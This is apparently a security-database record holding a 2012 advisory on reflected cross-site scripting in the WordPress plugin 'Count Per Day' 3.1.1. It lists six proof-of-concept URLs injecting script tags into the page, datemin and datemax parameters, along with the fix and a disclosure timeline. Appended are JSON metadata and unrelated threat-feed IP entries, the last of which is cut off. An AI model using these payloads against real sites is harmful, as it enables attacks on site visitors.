ID SECURITYVULNS:DOC:28330
Type securityvulns
Reporter Securityvulns
Modified 2012-07-23T00:00:00
Description
Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>
=========
Solution
=========
Upgrade to the latest version 3.2
====================
Disclosure Timeline
====================
29-Jun-2012 - vendor informed (contact form)
02-Jul-2012 - verified by Meistar
03-Jul-2012 - feedback from developer
14-Jul-2012 - fixed by developer
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://wordpress.org/extend/plugins/count-per-day/changelog/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt
{"id": "SECURITYVULNS:DOC:28330", "bulletinFamily": "software", "title": "WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities", "description": "Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities\r\nAdvisory ID: SSCHADV2012-015\r\nAuthor: Stefan Schurtz\r\nAffected Software: Successfully tested on 'Count Per Day' 3.1.1\r\nVendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day\r\nVendor Status: fixed\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nThe WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nUpgrade to the latest version 3.2\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n29-Jun-2012 - vendor informed (contact form)\r\n02-Jul-2012 - verified by Meistar\r\n03-Jul-2012 - feedback from developer\r\n14-Jul-2012 - fixed by developer\r\n \r\n========\r\nCredits\r\n========\r\n\r\nVulnerabilities found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://wordpress.org/extend/plugins/count-per-day/changelog/\r\nhttp://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt\r\n", "published": "2012-07-23T00:00:00", "modified": "2012-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28330", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:45", "edition": 1, "viewCount": 31, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2018-08-31T11:10:45", "rev": 2}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201591"]}, {"type": "mskb", "idList": ["KB2586448", "KB2979597", "KB2496326", "KB2559049", "KB980195", "KB2647516"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1532.NASL", "EULEROS_SA-2020-1555.NASL", "ALA_ALAS-2020-1364.NASL", "DEBIAN_DLA-2192.NASL", "EULEROS_SA-2020-1547.NASL", "EULEROS_SA-2020-1527.NASL", "EULEROS_SA-2020-1563.NASL"]}, {"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157528"]}], "modified": "2018-08-31T11:10:45", "rev": 2}, "vulnersScore": 2.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}
{"rst": [{"id": "RST:B9B59BF1-2CC7-31D3-AA6B-DD2256387EF6", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 189.50.138.10", "description": "Found **189[.]50.138.10** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **11**.\n First seen: 2021-10-06T03:00:00, Last seen: 2021-10-14T03:00:00.\n IOC tags: **proxy**.\nASN 28330: (First IP 189.50.128.0, Last IP 189.50.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 236 domains.\nGEO IP information: City \"Presidente Prudente\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-15T00:00:00", "modified": "2021-10-06T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-14T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4480267bbd048b991bc509f7a04d879c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "1c7805276b50861e4d0a32d06e5a6d40"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "034e4d1e49c3fed8d983be48bbbc1678"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "041535b9fde0ef8c440a779e3a56f218"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "e4de440ef4b99b3f4cf5986ca61b65de"}, {"key": "modified", "hash": "8d309ba4c1172dd85314930d0e0b966c"}, {"key": "published", "hash": "306b16bd390dc14e7be80edabc6e0835"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "eff01ef54a0a0ef7d0cd89602ce929d7"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5c4600ef94a451deb14b739d184048aa"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "83cc3507bac16eb21b23727b49396abbc7105a3e8d33cd269109b24c36bbaf20", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["189.50.138.10"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.87, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 11.0}, "tags": ["proxy"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Presidente Prudente", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 236, "firstip": {"netv4": "189.50.128.0", "num": "3174203392"}, "isp": "IFTNET", "lastip": {"netv4": "189.50.143.255", "num": "3174207487"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": []}, {"id": "RST:C036DBC5-8832-3F7B-8497-2C8D62F5953D", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 189.50.137.79", "description": "Found **189[.]50.137.79** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **32**.\n First seen: 2021-09-21T03:00:00, Last seen: 2021-10-13T03:00:00.\n IOC tags: **shellprobe**.\nASN 28330: (First IP 189.50.128.0, Last IP 189.50.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 236 domains.\nGEO IP information: City \"Sao Jose do Rio Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-14T00:00:00", "modified": "2021-09-21T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-13T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4480267bbd048b991bc509f7a04d879c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "a11a71cff438aa7b59431f1e0be6ddaa"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "19eca775c998de844c421f92f571e47c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "3b31042a91a597e0c994d87c7cf51746"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "54ab24f012b240b4ccf0947c7a2958f7"}, {"key": "modified", "hash": "8950ba15320bd50ed904cede9029415a"}, {"key": "published", "hash": "7570521fc10627be56d7935693fccc14"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "620c9128dbcd349fa2bd29f86d4b104f"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "bf83966f59b023d819c8896033baf86a9bc44deaa0aeafac1ec57f60ceeee3d1", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["189.50.137.79"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.69, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 32.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Sao Jose do Rio Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 236, "firstip": {"netv4": "189.50.128.0", "num": "3174203392"}, "isp": "IFTNET", "lastip": {"netv4": "189.50.143.255", "num": "3174207487"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "cvss2": {}, "immutableFields": [], "cvss3": {}, "threat": []}, {"id": "RST:FC04426A-DA74-3C05-86B7-750711934573", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 186.237.131.122", "description": "Found **186[.]237.131.122** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **1**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-10-12T03:00:00.\n IOC tags: **generic**.\nASN 28330: (First IP 186.237.128.0, Last IP 186.237.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 236 domains.\nGEO IP information: City \"Sao Jose do Rio Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-13T00:00:00", "modified": "2020-12-22T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-12T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "6d1f398d970cba68a1ff6e6e5281f047"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "830473f1635e670a95d1ccfcc0c08afb"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "19eca775c998de844c421f92f571e47c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "aa44bdcaf268dd90b23edadd7b9d4530"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "d0c757cd43c41c3dba08c9ef05f6712f"}, {"key": "modified", "hash": "548afddb941bc9ce879976084c7bcc9e"}, {"key": "published", "hash": "367bec30c0ba4b1e1089ea2e16dc01df"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "bbb077a3fb577a906a5bd3e47e4aeae1"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "040968b2b1a98644620f3c0143baa89ec169a9ccc9fa371dc72d8e8866f00f39", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["186.237.131.122"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.09, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 1.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Sao Jose do Rio Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 236, "firstip": {"netv4": "186.237.128.0", "num": "3136126976"}, "isp": "IFTNET", "lastip": {"netv4": "186.237.143.255", "num": "3136131071"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:1F6121D4-B30A-3293-A43B-6AF0152E1517", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 170.81.131.40", "description": "Found **170[.]81.131.40** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **30**.\n First seen: 2021-08-15T03:00:00, Last seen: 2021-09-06T03:00:00.\n IOC tags: ****.\nASN 28330: (First IP 170.81.128.0, Last IP 170.81.131.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 208 domains.\nGEO IP information: City \"Ribeiro Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-07T00:00:00", "modified": "2021-08-15T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-09-06T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "e490a60fb11584e555d70ab67583bad1"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "72d5e2f8ec3ecf7dd0b8b27e42afce44"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "dd118c3bfa5e64eeb07706672d6af65a"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "cc8bb94b35264a599c19bb16949ac101"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "3efb016b27347672ae77de41a5c3e49c"}, {"key": "modified", "hash": "ba150508ead943719bcfbd2181582831"}, {"key": "published", "hash": "c08643b7ad99ccb2287fff591690c4bc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "da5ee0ef5dbd0dbbf59e7a26596c37ec"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "9eb27ed05fd3eabe9baa947ef8adefb7dedc64cdd7814ce120010123bf66c666", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["170.81.131.40"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.69, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 30.0}, "tags": [], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Ribeiro Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 208, "firstip": {"netv4": "170.81.128.0", "num": "2857467904"}, "isp": "IFTNET", "lastip": {"netv4": "170.81.131.255", "num": "2857468927"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": []}, {"id": "RST:9C33056F-3912-3FB9-A6E4-D8DBFD23000F", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 189.50.138.12", "description": "Found **189[.]50.138.12** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **38**.\n First seen: 2021-08-16T03:00:00, Last seen: 2021-08-23T03:00:00.\n IOC tags: **generic**.\nASN 28330: (First IP 189.50.128.0, Last IP 189.50.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 228 domains.\nGEO IP information: City \"Presidente Prudente\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-24T00:00:00", "modified": "2021-08-16T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-23T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "89e246662e6386ddbcf8558c98008bdd"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "7a5d132abf9cf82ca69ad810ff7b30bd"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "034e4d1e49c3fed8d983be48bbbc1678"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5c2a1ce56d13da7ab575dcf139a67d09"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "24f8cc2c8a7d43358df382d9a15029bc"}, {"key": "modified", "hash": "fded62265478ea49444de88d1f4bebeb"}, {"key": "published", "hash": "1fd49358c9bd6a9dc4d6f9773081b085"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "f4ba8fe8462b9f648f221be55b90fa33"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "43628710bd7b55f731c47eae8c28e5ce14fd4d7167e7d185ed621d8544876911", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["189.50.138.12"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.88, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 38.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Presidente Prudente", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 228, "firstip": {"netv4": "189.50.128.0", "num": "3174203392"}, "isp": "IFTNET", "lastip": {"netv4": "189.50.143.255", "num": "3174207487"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": []}, {"id": "RST:724DC0DA-1D69-3AE2-AB1F-41585A3D18A9", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 189.50.141.74", "description": "Found **189[.]50.141.74** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2021-08-13T03:00:00, Last seen: 2021-08-13T03:00:00.\n IOC tags: **generic**.\nASN 28330: (First IP 189.50.128.0, Last IP 189.50.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 228 domains.\nGEO IP information: City \"Sao Jose do Rio Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-13T00:00:00", "modified": "2021-08-13T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-13T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "89e246662e6386ddbcf8558c98008bdd"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "31f094f83693ff626d6fe5e809e11e59"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "19eca775c998de844c421f92f571e47c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "239ebb425128eb034e99da9b7615f78c"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "c64aa27b14e432e4e12726474cc92045"}, {"key": "modified", "hash": "eb45ee330ece1d998183fb154d423653"}, {"key": "published", "hash": "eb45ee330ece1d998183fb154d423653"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "424801efc6f0e5de1088504d221692af"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "5c1c8a3eabf5b4baca1eed1b48ec9ecb31f2f7e22211ee069ac8cb7b3bfd8da4", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["189.50.141.74"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 43.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Sao Jose do Rio Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 228, "firstip": {"netv4": "189.50.128.0", "num": "3174203392"}, "isp": "IFTNET", "lastip": {"netv4": "189.50.143.255", "num": "3174207487"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": []}, {"id": "RST:42D3A2CC-9143-3BAA-BA96-72AB9F3E83A3", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 189.50.132.93", "description": "Found **189[.]50.132.93** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **46**.\n First seen: 2021-05-03T03:00:00, Last seen: 2021-05-16T03:00:00.\n IOC tags: **botnet**.\nWe found that the IOC is used by: **mirai**.\nASN 28330: (First IP 189.50.128.0, Last IP 189.50.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 226 domains.\nGEO IP information: City \"Sao Jose do Rio Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-05-17T00:00:00", "modified": "2021-05-03T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-05-16T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "af354b2b0f0fa6af2f87ca93c979a1ff"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "feab3d5fe04eaea927f94ca533061d16"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "19eca775c998de844c421f92f571e47c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "624da4e5b444bf842247b6ff80443ffc"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "122297877910406bc7ff23556cddb6c8"}, {"key": "modified", "hash": "1fa54cb3197606df2cc73c593df5f45b"}, {"key": "published", "hash": "2f0ee9373272973bb40fcb127f9e515f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "116169c46f3aa9873b1b6e5a0d285317"}, {"key": "threat", "hash": "41b326d9127f8bcf641c9355271e73dd"}, {"key": "title", "hash": "2dc222bcdd96285a43735173638057a3"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "661188e54218fcc8d9d965f233412f0c0e87635ced902a1fdb3cf1a7b59878c6", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["189.50.132.93"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.8, "ioc_src": 70.28, "ioc_tags": 0.83, "ioc_total": 46.0}, "tags": ["botnet"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Sao Jose do Rio Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 226, "firstip": {"netv4": "189.50.128.0", "num": 